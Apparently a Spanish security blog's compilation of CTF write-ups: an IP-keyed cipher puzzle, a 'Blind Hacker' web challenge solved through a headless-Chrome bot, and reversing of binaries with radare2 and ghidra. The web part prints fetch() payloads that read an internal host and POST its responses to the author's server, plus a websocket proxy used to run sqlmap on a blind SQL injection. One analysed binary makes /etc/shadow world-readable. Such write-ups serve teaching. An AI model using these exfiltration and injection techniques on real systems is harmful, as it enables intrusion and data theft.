Este level nos trajo por la calle de la amargura. Conseguimos pasar 4 niveles por encima de este pero aquí nos atascamos más allá del cierre del HackIt. No fuimos los únicos, como ya dije.
Pero quisimos solucionarlo y aprender por el camino, llegando al script final que acompaña a este post. Básicamente el servidor espera comandos cifrados (como «HELP ME PLEASE») tomando como clave la IP del cliente (suma de bytes). Así:
HELP ME PLEASE = 48 45 4c 50 20 4d 45 20 50 4c 45 41 53 45 IP CLIENTE = 207.188.163.1 = 0xcfbca301 (cada octeto a hex, concatenado) MENSAJE = \xab\xab\xae\xb3\x81\x80uQ\xb3\xb2\xa7\xa4\xb4x
Por ejemplo, para la primera letra (‘H’), sería así:
hex(0x48 + ord(‘c’)) = ‘0xab’
Con respecto a la respuesta que envía el servidor al comando HELP ME PLEASE, podemos descifrarla de forma equivalente, pero esta vez la clave será la IP del servidor:
Mensaje cifrado: add2a451939f9d93cfc7a0a4509499a5d1d29f9a929c95a581d6a09f6a508073b4b6888082745082ada87284755c5074baa80a IP del servidor: 172.17.0.2 (la IP de ikasten.io es 95.216.157.127, pero se está ejecutando sobre un container docker) = 0xac110002 Texto en claro: Los comandos disponibles son: PASSWORD PLEASE, BYE
De nuevo, un ejemplo: la L de ‘Los’ se obtiene así: chr(0xad – ord(‘a’)) = ‘L’
Si enviamos ahora el comando PASSWORD PLEASE, obtendremos la clave esperada.
Addendum: habíamos llegado a la conclusión de que la clave a usar para cifrar tenía que ver con la IP del cliente y para descifrar con la IP del server. ¿Cómo? Porque compartimos un script de cifraba el «HELP ME PLEASE» y lo enviaba al server… y sólo funcionaba en uno de los ordenadores del equipo. Así que el cifrado dependía del cliente… y la pista indicaba que también del servidor. En su momento habíamos pensado en un XOR (para cifrar, funciona igual que la suma de bytes), pero no probamos la combinación ganadora: pasar los octetos de la IP a hexa, concatenar y usar esa clave como string, caracter a caracter (no como el valor hexa de 0xa =10, sino como ord(‘a’)) = 97 🤷♂️)
El 24 de mayo el equipo de Follow the White Rabbit publicaba en su cuenta de Twitter (@fwhibbit_blog) un nuevo reto en la categoría Web, Blind Hacker, diseñado por @jorge_ctf:
Me gustó el anterior reto web, Mike’s Dungeon, del mismo diseñador, pero también sabía que suelen requerir mucho tiempo y café. No soy el único que así lo cree 🙂
En la descripción vemos que hay que “llamar” a un bot (@blindhackerchallbot) a través de Telegram. Si nos comunicamos con él veremos que hay que llamarle con el comando /scan y pasarle una URL que nos escaneará durante 10 segundos:
En estos casos suelo poner a la escucha la herramienta netcat en modo servidor para ver quién se conecta:
Interesante, Headless Chrome 83. El bot abre una conexión contra nuestro servidor usando este navegador en modo headless durante 10 segundos. También tenemos una pista en el enunciado del ejercicio: “Server is at: http://blind_hacker/”. Da la sensación de que tenemos que conseguir dirigir – a distancia – ese navegador headless hacia su propia red, en concreto a ese servidor.
En un primer momento creo que el texto de la pista no contenía el protocolo (http), sino sólo el nombre del servidor. Así que pensé en ver a qué servicio estaba asociado. La idea era usando ese navegador headless para mis propósitos, en concreto, para escanear los puertos del host blind_server. ¿Pero cómo? Usando el API Fetch.
La idea es la siguiente, preparar una página sencilla que incluya sólo un JavaScript. Esa página será la que digamos al bot que escanee. Nuestro script ejecutará algo similar a esto:
Chrome está ejecutando un script de ikasten.io que lanza peticiones Fetch a otro dominio. Eso no es Kosher 🙂 No lo ejecutará a no ser que el servidor que recibe la petición (blind_hacker) incorpore una cabecera CORS que lo autorice. El mode: ‘no-cors’ permite hace este tipo de llamadas, pero a su vez, indica al navegador que los scripts no pueden acceder al contenido de la respuesta. Pues vaya, ¿entonces para qué hacemos la petición? Sencillo, sólo nos interesa saber si hay respuesta, no cuál es el contenido de esa respuesta.
Tal y como comenta el propio autor del reto: “Debido a que chrome (o creo que incluso todos los navegadores) implementan CORS por defecto en localhost, tuve que añadir a selenium esta opción:
chrome_options.add_argument(‘–disable-web-security’) # Nos olvidamos de CORS de manera global
Console.log o Beeceptor
Está bien que un console.log nos muestre el resultado por la consola del navegador. Pero nos olvidamos de un “detallito”: no podemos acceder a ver el contenido de es consola 🙂 Tenemos que exfiltrar ese contenido a un servidor externo que podamos visualizar. Hay varias formas de hacer esto, pero una rápida es usar la herramienta online Beeceptor: https://beeceptor.com/ . Añadimos un end-point y cada que vez alguien “llame” a ese end-point veremos una nueva línea de log con detalles de la llamada. Algo similar a lo que hace el servicio Burp Suite Collaborator (pero Beeceptor sólo sirve para interceptar llamadas HTTP/S y Collaborator acepta muchos otros protocolos).
El payload podría ser algo como esto para los primeros 1024 puertos:
Monitorizando beeceptor, vemos que llega una petición informando que el puerto 80 de blind_hacker está abierto 🙂
Automatizando las peticiones al bot de Telegram
Llegados a este punto, nos damos cuenta de que va a ser necesario automatizar las peticiones al bot. Así que instalamos telegram-cli, o más bien el fork del usuario kenorb que lo mantiene actualizado (el original lleva 5 años sin ser tocado). A partir de ahora, podremos lanzar las peticiones al bot así:
Usando el API Fetch podemos lanzar consultas manuales a http://blind_hacker y exfiltrar las respuestas a Beeceptor o a un servidor que pongamos a la escucha. Esta segunda opción es la que más me gusta, pues así tendremos control absoluto (Beeceptor tiene un máximo de requests diarios, a partir de ese número es necesario pagar). Hacerlo en node+express es sencillo (req.text no es un atributo de serie, hay que obtenerlo a través del middleware raw-body):
Ahora, un fetch(“http://ikasten.io:3000/proxy”) mostrará por consola los parámetros que le lleguen por POST y enviará los mismos como respuesta HTTP. Modificamos el payload para leer la respuesta de blind_hacker:
fetch('http://blind_hacker').
then(resp => resp.text()).then( data {
fetch('http://ikasten.io:3000/echo',{
method:'POST',
body: data});});
Nota: hemos quitado el mode: ‘no-cors’ asumiendo que el servidor remoto acepta peticiones CORS. También hemos usado el método POST para la exfiltración de datos.
Y vemos por consola:
indextoken param not supplied.
Bueno, poco a poco estamos consiguiendo extraer información. ¿Qué habrá que pasar con ese indetoken? Intentamos algo al azar:
fetch('http://blind_hacker/?indextoken=trololo').
then(resp => resp.text()).then( data =>{
fetch('http://ikasten.io:3000/echo',{
method:'POST',
body: data
})});
fetch('http://blind_hacker/?indextoken=trololo').
then(resp => resp.text()).then( data => {
fetch('http://ikasten.io:3000/echo', {
method: 'POST',
body: data
})});
Y obtenemos la respuesta que buscábamos:
Invalid token! Have you met token.php?
Así que toca pasarse primero por token.php. La cosa empieza a complicarse ¿eh?
fetch('http://blind_hacker/token.php').
then(resp => resp.text()).then( data =>{
fetch('http://ikasten.io:3000/echo',
method:'POST',
body: data
});});
fetch('http://blind_hacker/token.php').
then(resp => resp.text()).then( data => {
fetch('http://ikasten.io:3000/echo',
method: 'POST',
body: data
}); });
Respuesta:
There you go -> 1fJJiyk5MfunjctynqkyqfgfY2x00auLmWrPNDub
Necesitamos trocear el token y pasárselo a blind_hacker. Algo así:
¡Vaya! Un formulario con username y password. Aquí intenté el envío de login y password típicos mediante POST y el API Fetch, pero tras unos cuantos intentos ví que no iban por ahí los tiros. Hasta que se me ocurrió probar un SQLi en el campo password:
Wow, tenemos un BlindSQLInjection en toda regla. Podemos explotarlo a mano, poco a poco, de forma muy cansina. O podemos valernos de nuestros conocimientos como ingenieros software, desarrollar un proxy y hacer que trabajen los expertos (sqlmap). Obviamente nos decantamos por la segunda opción 🙂
Un proxy HTTP/websocket
Tenemos que conseguir enviarle peticiones HTTP al headless Chrome y que éste las redirija al target blind_hacker . Pero por cuestiones de seguridad Chrome no puedeabrirconexiones a través de un socket como haríamos por ejemplo con netcat. Lo más cerca que podemos llegar es a abrir un websocket, recibir la petición http por el websocket y redirigirla al target (y la respuesta pasarla al origen siguiendo el orden inverso).
Estuve indagando sobre un proxy websocket/socketTCP, y encontré alguna opción como websockify o proxy.rb de Beef pero no conseguí que funcionaran para mi obejtivo. Leyendo el código fuente de proxy.rb tampoco_parecía_tan_difícil (™). Así que me puse manos a la obra, y un par de días después tenía el proxy funcionando 🙂
Beef llama hooked browsers a este tipo de browsers que podemos controlar a distancia. A este ataque también se les conoce como Browser in the Middle. La implementación sigue la siguiente arquitectura:
El hooked browser lanza un mensaje browser-connect a través del ws con el servidor y queda a la espera de recibir más peticiones a través del mismo socket
Nuestro servidor express recibe una petición POST del cliente, la guarda en mongodb asignándole un ID, la envía por el websocket (“mensaje”) y se mete en un bucle de polling, consultando a mongodb hasta que encuentre una tupla con respuesta para ese ID
El hooked browser recibe el “mensaje” y lo reenvía a blind_hacker vía API Fetch + http, captura la respuesta de blind_hacker y la envía por el websocket (mensaje tipo “answer”)
Express recibe la respuesta y actualiza la tupla correspondiente a ese ID con el valor de la respuesta (desbloqueando el proceso de polling y enviando vía http la respuesta al cliente)
Notas: Sin risk=3 no encontrará nada porque es un OR-based blind tal y como hemos visto en la sección anterior (API Fetch). Ídem para el sufijo (suffix=”– “), que hemos encontrado con una petición POST a través del API Fetch. La opción –dbms asume MySQL, pero no haría falta, una primera pasada de sqlmap ya detectaría el motor de la bbdd.
available databases [3]:
[*] blindhackerDB
[*] information_schema
[*] tokenDB
PD: en 10 segundos, incluso con los 4 threads que le hemos metido a sqlmap no podrá escanear los nombres de las 3 BBDD vía blind sqli en un sólo intento. Habrá que darle varias veces a la manivela 🙂
Ya tenemos el nombre de las BBDD. Vamos a por las tablas de blindhackerBD.
Para depurar en radare, vamos a preparar un poco el entorno. Sabemos que el binario pide un input y muestra por pantalla ciertos outputs. Para poder usar el debugger en estos casos suelo preparar un fichero con el input a pasarle al binario (le llamaré payload) y abrir otra terminal donde poder ver el output. Si usamos screen o tmux, podremos hacerlo en la misma ventana: Ctrl+a+| para hacer split vertical. Ctrl+a+tab para colocarnos en la sección derecha. Ctrl+a+c para crear una nueva región. Ctrl+a+: y tecleamos resize 40 para redimensionar la región. Tecleamos ahora tty para ver el identificador de terminal y lo apuntamos (/dev/pts/3, por ejemplo). Ctrl+a+tab para colocarnos en la sección izquierda. Editamos foo.rr2 con la configuración indicada:
stdio=/dev/pts/3
stdin=./payload
En payload metemos el input inicial, por ejemplo ABCDEFGHIJK.
radare2 fue el campeón en la lucha ghidra vs. radare
Todo listo para comenzar a darle calor al debugger:
r2 -e dbg.profile=foo.rr2 -d cracked
Recuerda, aaa para analizar flags, strings, funciones… Le costará un rato. Ahora V (visual mode), p (modo desensamblado) , p (igual, pero viendo registros y pila).
:db main breakpoint en el main (intro)
_(buscar referencias), Good (sabemos por los strings que pondrá Good job). Intro. x. radare nos situará sobre el código que comprueba nuestro input.
El binario recibe nuestro input y luego concatena dos strings (strcat + strcat) para comparar el resultado con el input (strcmp). Si coinciden, muestra «Good job» y nuestro input es la flag que buscamos.
Podemos poner otro breakpoint al comienzo de esta sección (con F2 ponemos breakpoints en modo visual, sin tener que teclear «db 0xdirección») y otro tras el segundo strcat. Tecleamos :dc para saltar de breakpoint a breakpoint, analizando registros.
Aquí está el meollo de la cuestión
Tenemos un bucle que itera sobre el input y realiza las siguientes operaciones:
input = [0x41, 0x42, 0x43, ..., 0x49] # el input que le pasamos
IV = 0x50
flag = ""
for i in range(len(input)):
if i == 0:
flag += chr(IV ^ input[i])
else:
flag += chr(input[i - 1] ^ input[i])
El resultado final lo compara con esta cadena de bytes:
La cadena de bytes que buscamos {1b,52, 3f,5e ,29,4c, 3a,55 ,33,5f, 3e,59,00,7f}
Así que hay que invertir el algoritmo.
sol = [0x1b, 0x52, 0x3f, 0x5e, 0x29, 0x4c, 0x3a, 0x55, 0x33, 0x5f, 0x3e, 0x59]
idx = 0
left = 0x50
newFileBytes = []
for i in range(0,len(sol)):
right = sol[idx]
sig = left ^ right
print(sig)
newFileBytes.append(sig)
left = sol[idx]
idx = idx + 1
newFile = open("flag.txt", "wb")
newFileByteArray = bytearray(newFileBytes)
newFile.write(newFileByteArray)
Tenemos un binario ELF para x86. Vamos a analizar strings:
VIP ACCESS y /etc/shadow en la misma pantalla suena peligroso 🙂
Vemos las cadenas características de éxito/fracaso y también extrañas cadenas kill, /etc/shadow, /etc, nonexist.txt…
¿Qué dira ghidra al respecto? Curiosamente si intentamos decompilar la función main veremos que se queda prácticamente colgado. Al cabo de un minuto o dos vuelve a la vida y vemos que el proceso de decompilación las está pasando canutas:
Decompilando main… no le ha gustado mucho
¿Qué estará ocurriendo con ese binario? Creamos un docker para ejecutarlo con prudencia. chmod +x ./decoded y antes de lanzarlo nos acordamos del «Don’t run as root» y viendo la cadena /etc/shadow en el binario, igual es una buena idea hacerlo como usuario no-root, sí.
No parece que haya nada raro a simple vista…
Vamos a trazarlo con strace ./decoded
«Tracer detected!»… vaya
No le gusta tampoco el strace. Mientras lo hacíamos, ghidra a vuelto a la vida y al menos nos deja curiosear por el desensamblado de main (el decompilador sigue loco)
Decenas de llamadas a funciones para generar errores artificialmente
Esas funciones generate_error_X sí que son descompilables. Por ejemplo, generate_error_1 es una simpática función que cambia los permisos de /etc/shadow
Tu /etc/shadow será legible para todo el mundo si ejecutas el binario como root
La cadena nonexist.txt se debía a esto otro:
Provocando otro error al abrir un fichero no-existente
Como ejercicio interesante vamos a ver dónde detecta el tracer y parchear el binario para que no lo haga. Copiamos el binario en cracked, lo abrimos en radare con radare2 -w cracked. Analizamos el mismo con el comando aaa. Pulsamos V (modo visual) y p para ver el desensamblado. Pulsamos ahora _ para ver referencias a cadenas, tecleamos tracer y pulsamos intro . Pulsamos x (cross-references) para que nos lleve a la línea de código donde se usa la cadena tracer y pusalmos intro.
En 0x0125d vemos la llamada a call sym.imp.ptrace y un jne a 0x01296 si no lo detecta. Debemos invertir la lógica del jne a je.
Nos situamos en 0x0000126a y pulsamos A para empezar a añadir el código que queremos (je 0x1296). El mismo radare2 generará el código de operación necesario (742a). Pulsamos intro y guardarmos el resultado. Salimos con q y quit.
radare2 nos permite parchear un binario con el comando A
Ahora sí, strace nos informa de multitud de llamadas a funciones para generar errores:
wow… kill(-9999,SIG_0), open(«nonexist.txt»), chmod(«/etc/shadow»,0754) a cascoporro…
Al haber eliminado esa protección anti-tracer también conseguiremos facilitar el análisis del binario con radare2, esta vez en modo debug. Veamos cómo hacerlo en el siguiente post.
La gente de fwhibbit (Follow the White Rabbit) sigue publicando retos en el CTF de la c0r0n4con aún tras haber finalizado la conferencia. Ya comenté en su día que Mike’s Dungeon (Web) de @jorge_ctf me pareció una pequeña obra de arte. Hoy le toca el turno a otra joya, EB Secret (Misc), de @naivenom.
EB Secret entra en la categoría Misc, agrupando técnicas web y reversing
EB Secret comienza con un sencillo mensaje que abre la caja de Pandora.
«The new platform for premium video is vulnerable. Do you know the way to obtain the obsolete program and recover the secret key? DON`T RUN AS ROOT. http://167.172.187.39:8004/»
El «Don’t run as root» ahora no lo terminamos de entender, pero tomará sentido dentro de poco… Así que nos adentramos en la madriguera del conejo, y nos encontramos con el primer pasadizo:
admin como parámetro en la URL y admin reflejado en el contenido de la página. Mmmh…
http://167.172.187.39:8004/secret?name=trololo refleja el nombre trololo. http://167.172.187.39:8004/secret?name=`ls` refleja directamente, sin interpretar las comillas (¡hey! tenía que intentarlo). También podemos comprobar que hay limitación de tamaño en el parámetro, admite 30 caracteres. Si metemos un valor de 31, el contenido reflejado vuelve a tomar el valor admin: http://167.172.187.39:8004/secret?name=1234567890123456789012345678901
Probar, probar y probar… Costó demasiado que llegara la inspiración:
Copiamos el contenido en un archivo s.64 y lo parseamos.
import base64
f=open("s.b64", "r")
contents =f.read()
splited = contents.split(',')
res = ''
for i in splited:
res = res + i.strip().replace('\'','').replace('\\n','').replace('[','').replace(']','')
base64_img_bytes = res.encode('utf-8')
with open('decoded', 'wb') as file_to_save:
decoded_image_data = base64.standard_b64decode(base64_img_bytes)
file_to_save.write(decoded_image_data)
Veamos qué tenemos por aquí:
$ file decoded decoded: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=33e62720986f5c9ad3c036ef7ec5118f7e19fd09, not stripped
Yeah, ¿bajamos un nivel más en la madriguera del conejo? Esto se pone interesante…
